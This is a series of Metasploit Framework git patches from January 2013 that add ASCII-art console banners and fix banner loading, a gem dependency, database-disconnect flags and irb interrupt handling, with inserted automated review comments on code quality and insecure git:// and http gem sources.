NMMMMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr +%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr +%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr +%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr +%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr +%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr +%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr +%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr +%clr + 
diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt new file mode 100644 index 000000000000..1eda5e790a2e --- /dev/null +++ b/lib/msf/ui/logos/missile-command.txt @@ -0,0 +1,30 @@ +%clr + ______________________________________________________________________________ +| | +| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | +|______________________________________________________________________________| + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr . %yel/%clr %yel/%clr x + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr %yel/%clr + %yel/%clr + %yel\%clr + %yel/%clr %yel/%clr + * %yel/%clr %yel/%clr + %yel/%clr . %yel/%clr + X %yel/%clr %yel/%clr X + %yel/%clr %red###%clr + %yel/%clr %red# %bld%%clr%red #%clr + %yel/%clr %red###%clr + . %yel/%clr + . %yel/%clr . %red*%clr . + %yel/%clr + * + + %red*%clr + + %bld^%clr +#### __ __ __ ####### __ __ __ #### +#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### +################################################################################ +################################################################################ +# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # +################################################################################ +%clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt new file mode 100644 index 000000000000..d5aff31eb227 --- /dev/null +++ b/lib/msf/ui/logos/ninja.txt 
@@ -0,0 +1,31 @@ +%clr ######## # + ################# # + ###################### # + ######################### # + ############################ + ############################## + ############################### + ############################### + ############################## + # ######## # + %red##%clr %red###%clr #### ## + ### ### + #### ### + #### ########## #### + ####################### #### + #################### #### + ################## #### + ############ ## + ######## ### + ######### ##### + ############ ###### + ######## ######### + ##### ######## + ### ######### + ###### ############ + ####################### + # # ### # # ## + ######################## + ## ## ## ## +%clr + diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt new file mode 100644 index 000000000000..9a9c1fa0bbd6 --- /dev/null +++ b/lib/msf/ui/logos/null-pointer-deref.txt 
@@ -0,0 +1,38 @@ +%clr%whi +Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f +EFLAGS: 00010046 +eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 +esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 +ds: 0018 es: 0018 ss: 0018 +Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) + +%bld +Stack: 90909090990909090990909090 + 90909090990909090990909090 + 90909090.90909090.90909090 + 90909090.90909090.90909090 + 90909090.90909090.09090900 + 90909090.90909090.09090900 + .......................... + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + ccccccccc................. + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .................ccccccccc + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .......................... + ffffffffffffffffffffffffff + ffffffff.................. + ffffffffffffffffffffffffff + ffffffff.................. + ffffffff.................. + ffffffff.................. +%clr + +%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr +Aiee, Killing Interrupt handler +%redKernel panic: Attempted to kill the idle task! +In swapper task - not syncing +%clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt new file mode 100644 index 000000000000..ca62faacf8e8 --- /dev/null +++ b/lib/msf/ui/logos/r7-metasploit.txt 
@@ -0,0 +1,16 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/test.rb b/lib/msf/ui/logos/test.rb new file mode 100644 index 000000000000..2a8e06341478 --- /dev/null +++ b/lib/msf/ui/logos/test.rb @@ -0,0 +1,5 @@ + +here = File.expand_path(File.dirname(__FILE__)) + +puts "Hi I live #{here}!" + diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt new file mode 100644 index 000000000000..e5606e1abdd0 --- /dev/null +++ b/lib/msf/ui/logos/wake-up-neo.txt 
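Review bot: `lib/msf/ui/logos/test.rb` looks like a scratch script used to check `File.expand_path(File.dirname(__FILE__))` and is not referenced by `banner.rb` in this commit; it should probably be dropped before merging. A directory that the commit message describes as content rather than code is an odd place for an executable `.rb` file. Anything that later globs or loads that directory would pick it up.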
@@ -0,0 +1,25 @@ +%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc + + Trace program: running + + wake up, Neo... + %bldthe matrix has you%clr + follow the white rabbit. + + knock, knock, Neo. + + (`. ,-, + ` `. ,;' / + `. ,'/ .' + `. X /.' + .-;--''--.._` ` ( + .' / ` + , ` ' Q ' + , , `._ \\ + ,.| ' `-.;_' + : . ` ; ` ` --,.._; + ' ` , ) .' + `._ , ' /_ + ; ,''-,;' ``- + ``-..__``--` +%clr diff --git a/lib/msf/ui/logos/workflow-cartoon.txt b/lib/msf/ui/logos/workflow-cartoon.txt new file mode 100644 index 000000000000..1437bb8eed0f --- /dev/null +++ b/lib/msf/ui/logos/workflow-cartoon.txt @@ -0,0 +1,22 @@ + %whi+-------------------------------------------------------+ + %whi| METASPLOIT by Rapid7 | + %whi+---------------------------+---------------------------+ + %whi| %blu__________________ %whi| | + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| + %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| + %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| + %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| + %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| + %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\\\ %whi| %grn********************* %whi| + %whi+---------------------------+---------------------------+ + %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| + %whi| o O | %yel)%whi======%yel( %whi| + %whi| o | %yel.' %whiLOOT %yel'. %whi| + %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| + %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| + %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| + %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| + %whi+---------------------------+---------------------------+%clr + %clr 
From 12f0501f2f7254d100ad881bafbab6b5aa9999c5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 20:38:14 -0600 Subject: [PATCH 016/421] Add a little erorr checking, another cow --- lib/msf/ui/banner.rb | 11 +++++++++-- lib/msf/ui/web/r7-metasploit.txt | 17 +++++++++++++++++ 2 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 lib/msf/ui/web/r7-metasploit.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index d02f48560cea..f6fee11d1157 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -32,16 +32,23 @@ module Banner def self.readfile(fname) base = File.expand_path(File.dirname(__FILE__)) - File.open(File.join(base, "logos", fname)) {|f| f.read f.stat.size} + pathname = File.join(base, "logos", fname) + begin + fdata = File.open(pathname) {|f| f.read f.stat.size} + rescue SystemCallError + fdata = "" + end end def self.to_s if ENV['GOCOW'] - case rand(2) + case rand(3) when 0 self.readfile Logos[1] when 1 self.readfile Logos[5] + when 2 + self.readfile Logos[6] end else self.readfile Logos[rand(Logos.length)] diff --git a/lib/msf/ui/web/r7-metasploit.txt b/lib/msf/ui/web/r7-metasploit.txt new file mode 100644 index 000000000000..024a5853aca6 --- /dev/null +++ b/lib/msf/ui/web/r7-metasploit.txt 
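Review bot: The `GOCOW` branch in `to_s` selects banners by position (`Logos[1]`, `Logos[5]`, and now `Logos[6]`), so inserting or reordering a name in `Logos` silently changes which files are treated as cows. Naming them removes the coupling: `cows = %w{cow-head.txt branded-longhorn.txt cowsay.txt}` followed by `self.readfile cows[rand(cows.length)]`. In `readfile`, the rescue makes a missing file yield an empty string with no hint to the user. The method's return value also depends on the `begin` expression being its last statement, so an explicit `fdata` on the final line would make that intent clear. The rest of `to_s` lies outside the hunk.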
@@ -0,0 +1,17 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% + From 6f26e9efb24a0936faf40c2a9b263b18b304af5b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 22:32:53 -0600 Subject: [PATCH 017/421] More banner sanity checking. --- lib/msf/ui/banner.rb | 8 ++++++-- .../{workflow-cartoon.txt => workflow.txt} | 0 lib/msf/ui/web/r7-metasploit.txt | 17 ----------------- 3 files changed, 6 insertions(+), 19 deletions(-) rename lib/msf/ui/logos/{workflow-cartoon.txt => workflow.txt} (100%) delete mode 100644 lib/msf/ui/web/r7-metasploit.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index f6fee11d1157..5f53bef07e60 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb 
@@ -33,11 +33,15 @@ module Banner def self.readfile(fname) base = File.expand_path(File.dirname(__FILE__)) pathname = File.join(base, "logos", fname) + fdata = "<< Missing banner: #{fname} >>" begin + raise ArgumentError unless File.readable?(pathname) + raise ArgumentError unless File.stat(pathname).size < 4096 fdata = File.open(pathname) {|f| f.read f.stat.size} - rescue SystemCallError - fdata = "" + rescue SystemCallError, ArgumentError + nil end + return fdata end def self.to_s diff --git a/lib/msf/ui/logos/workflow-cartoon.txt b/lib/msf/ui/logos/workflow.txt similarity index 100% rename from lib/msf/ui/logos/workflow-cartoon.txt rename to lib/msf/ui/logos/workflow.txt diff --git a/lib/msf/ui/web/r7-metasploit.txt b/lib/msf/ui/web/r7-metasploit.txt deleted file mode 100644 index 024a5853aca6..000000000000 --- a/lib/msf/ui/web/r7-metasploit.txt +++ /dev/null 
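Review bot: The two guards in `readfile` test the path (`File.readable?(pathname)`, `File.stat(pathname).size`) while the read happens on a separate `File.open`, so the file that was measured is not guaranteed to be the file that is read. Checking the size on the opened handle keeps the cap and lets the existing `rescue SystemCallError` cover unreadable files: `File.open(pathname) {|f| fdata = f.read(f.stat.size) if f.stat.size < 4096 }`. That also removes the `raise ArgumentError` used purely as control flow and the no-op `nil` in the rescue body. The 4096 limit is a bare literal; a named constant with a comment saying why banners are capped would help the next reader.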
@@ -1,17 +0,0 @@ -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% - From 950902f85606d1b80a934c7ab0f17b46c247f2f3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 22:33:30 -0600 Subject: [PATCH 018/421] Add a tasteful URL to some banners. --- lib/msf/ui/logos/3kom-superhack.txt | 1 + lib/msf/ui/logos/metasploit-shield.txt | 3 +-- lib/msf/ui/logos/missile-command.txt | 1 + lib/msf/ui/logos/ninja.txt | 2 ++ lib/msf/ui/logos/r7-metasploit.txt | 2 +- lib/msf/ui/logos/wake-up-neo.txt | 3 ++- 6 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt index a2097f972ae0..4d1123f35429 100644 --- a/lib/msf/ui/logos/3kom-superhack.txt +++ b/lib/msf/ui/logos/3kom-superhack.txt 
@@ -15,5 +15,6 @@ | %bld[ OK ]%clr | |______________________________________________________________________________| | | +| http://metasploit.pro | |______________________________________________________________________________| %clr diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt index 7f8648754fe2..41f1d971c724 100644 --- a/lib/msf/ui/logos/metasploit-shield.txt +++ b/lib/msf/ui/logos/metasploit-shield.txt @@ -18,5 +18,4 @@ %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr - +%clr%bld http://metasploit.pro diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index 1eda5e790a2e..aedd60471100 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,4 +27,5 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index d5aff31eb227..9bc984822b9f 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,5 +27,7 @@ # # ### # # ## ######################## ## ## ## ## + + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt index ca62faacf8e8..f65028259727 100644 --- a/lib/msf/ui/logos/r7-metasploit.txt +++ b/lib/msf/ui/logos/r7-metasploit.txt 
@@ -1,7 +1,7 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt index e5606e1abdd0..2f9fd96793b0 100644 --- a/lib/msf/ui/logos/wake-up-neo.txt +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -22,4 +22,5 @@ `._ , ' /_ ; ,''-,;' ``- ``-..__``--` -%clr + + http://metasploit.pro%clr From f8e1ccc27eac4e0ee4b56cb666fe5e67b5023d43 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 10 Jan 2013 17:50:00 -0600 Subject: [PATCH 019/421] Remove cred_files migration [#41837027] Mdm::CredFile is only used in Pro, so for metasploit_data_models 0.4.0, Mdm::CredFiles has been moved to Pro, so the migration has been moved to Pro too. --- Gemfile | 4 +--- Gemfile.lock | 21 +++++++++---------- .../20110608113500_add_cred_file_table.rb | 20 ------------------ 3 files changed, 11 insertions(+), 34 deletions(-) delete mode 100755 data/sql/migrate/20110608113500_add_cred_file_table.rb diff --git a/Gemfile b/Gemfile index 0bb1135b0bf7..502e0060b3cc 100755 --- a/Gemfile +++ b/Gemfile 
@@ -2,10 +2,8 @@ source 'http://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' -# Needed for Msf::DbManager -gem 'activerecord' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' group :development do # Markdown formatting for yard diff --git a/Gemfile.lock b/Gemfile.lock index a9531cb60126..99f60b664ded 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,10 +1,10 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 73f26789500f278dd6fd555e839d09a3b81a05f4 - tag: 0.3.0 + revision: 448c1065329efea1eac76a3897f626f122666743 + tag: 0.4.0 specs: - metasploit_data_models (0.3.0) - activerecord + metasploit_data_models (0.4.0) + activerecord (>= 3.2.10) activesupport pg pry @@ -12,15 +12,15 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.9) - activesupport (= 3.2.9) + activemodel (3.2.11) + activesupport (= 3.2.11) builder (~> 3.0.0) - activerecord (3.2.9) - activemodel (= 3.2.9) - activesupport (= 3.2.9) + activerecord (3.2.11) + activemodel (= 3.2.11) + activesupport (= 3.2.11) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.9) + activesupport (3.2.11) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) @@ -57,7 +57,6 @@ PLATFORMS ruby DEPENDENCIES - activerecord activesupport (>= 3.0.0) metasploit_data_models! rake diff --git a/data/sql/migrate/20110608113500_add_cred_file_table.rb b/data/sql/migrate/20110608113500_add_cred_file_table.rb deleted file mode 100755 index 9780e261e780..000000000000 --- a/data/sql/migrate/20110608113500_add_cred_file_table.rb +++ /dev/null 
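Review bot: The updated `metasploit_data_models` line in the Gemfile still fetches over `git://`, which has no encryption or server authentication, so the code Bundler installs can be altered in transit; the unchanged `source 'http://rubygems.org'` has the same weakness. Suggest `:git => 'https://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'` and `source 'https://rubygems.org'`. The revision recorded in Gemfile.lock helps only for installs that honour the lock, and a tag can be moved upstream. Dropping `gem 'activerecord'` also means `Msf::DbManager` now gets ActiveRecord only transitively through `metasploit_data_models`; if framework code requires it directly, keeping the explicit entry documents that.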
@@ -1,20 +0,0 @@ -class AddCredFileTable < ActiveRecord::Migration - - def self.up - create_table :cred_files do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :path, :limit => 1024 - t.string :ftype, :limit => 16 - t.string :created_by - t.string :name, :limit => 512 - t.string :desc, :limit => 1024 - - t.timestamps - end - end - - def self.down - drop_table :cred_files - end - -end From aa36b65aeee8b8e5cfb05fc69c68536450c19731 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 11 Jan 2013 01:10:56 -0600 Subject: [PATCH 020/421] [FixRM #7673] "Failed to reload" error. When db_disconnect is issued, this funtion does not update the status of self.migrated to false. So when another reload command is used, the update_module_details function will still try to connect to the database, which causes the "Failed to reload" error. --- lib/msf/core/db_manager.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index f564ea3ef3b9..f78a8cb7d0d1 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -268,6 +268,7 @@ def create_db(opts) def disconnect begin ActiveRecord::Base.remove_connection + self.migrated = false rescue ::Exception => e self.error = e elog("DB.disconnect threw an exception: #{e}") From b388f2357c5a35da27938fcfa052c8273b5dd71f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 12 Jan 2013 00:08:30 -0600 Subject: [PATCH 021/421] Reset modules_cached flag when database disconnects --- lib/msf/core/db_manager.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index f78a8cb7d0d1..914d126c7103 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -269,6 +269,7 @@ def disconnect begin ActiveRecord::Base.remove_connection self.migrated = false + self.modules_cached = false rescue ::Exception => e self.error = e elog("DB.disconnect threw an exception: #{e}") 
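Review bot: In `disconnect` (db_manager.rb, this patch and the next one), the added `self.migrated = false` and `self.modules_cached = false` run only when `ActiveRecord::Base.remove_connection` returns normally. If that call raises, control jumps to the `rescue` and both flags keep their old values, which is the stale state the commit message blames for the "Failed to reload" error. Moving the two assignments into an `ensure` clause of the same `begin` block resets them on both paths. The method starts and ends outside the hunk, so this assumes nothing later in `disconnect` already clears them.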
From 2f2a5c1d475337cc58a45d2b7e6bc7d70ca78a62 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 12 Jan 2013 01:43:40 -0600 Subject: [PATCH 022/421] [FixRM: #2100] Rescue TerminateLineInput in irb In irb, when you hit ^c, you will get an ugly backtrace. This fix handles that exception. --- lib/rex/ui/text/irb_shell.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb index 10cd345a6535..c5bb82c7328f 100644 --- a/lib/rex/ui/text/irb_shell.rb +++ b/lib/rex/ui/text/irb_shell.rb @@ -41,7 +41,11 @@ def run # Trap interrupt old_sigint = trap("SIGINT") do - irb.signal_handle + begin + irb.signal_handle + rescue RubyLex::TerminateLineInput + print ">> " + end end # Keep processing input until the cows come home... From 90b0a7035b35eb4af73845462b6170ea24eb05a0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 13 Jan 2013 13:24:48 -0600 Subject: [PATCH 023/421] Recover the prompt again --- lib/rex/ui/text/irb_shell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb index c5bb82c7328f..e7d6baf72eb5 100644 --- a/lib/rex/ui/text/irb_shell.rb +++ b/lib/rex/ui/text/irb_shell.rb @@ -44,7 +44,7 @@ def run begin irb.signal_handle rescue RubyLex::TerminateLineInput - print ">> " + irb.eval_input end end From b3b68c1b90df96128c6768fae4fe6cd9cd9f9f10 Mon Sep 17 00:00:00 2001 
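Review bot: The second irb_shell.rb patch calls `irb.eval_input` from inside the `trap("SIGINT")` block, so after the first interrupt the read-eval loop runs in signal-handler context, nested under the loop that was interrupted. Because the call sits in the `rescue` clause, a `RubyLex::TerminateLineInput` raised by that nested loop is not caught by this `begin`/`rescue`, so the backtrace the previous patch removed may come back on a second Ctrl-C. I would keep the handler to `irb.signal_handle` plus the rescue, and let the main loop in `run` redraw the prompt. That loop is outside the hunk, so how it resumes needs checking.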
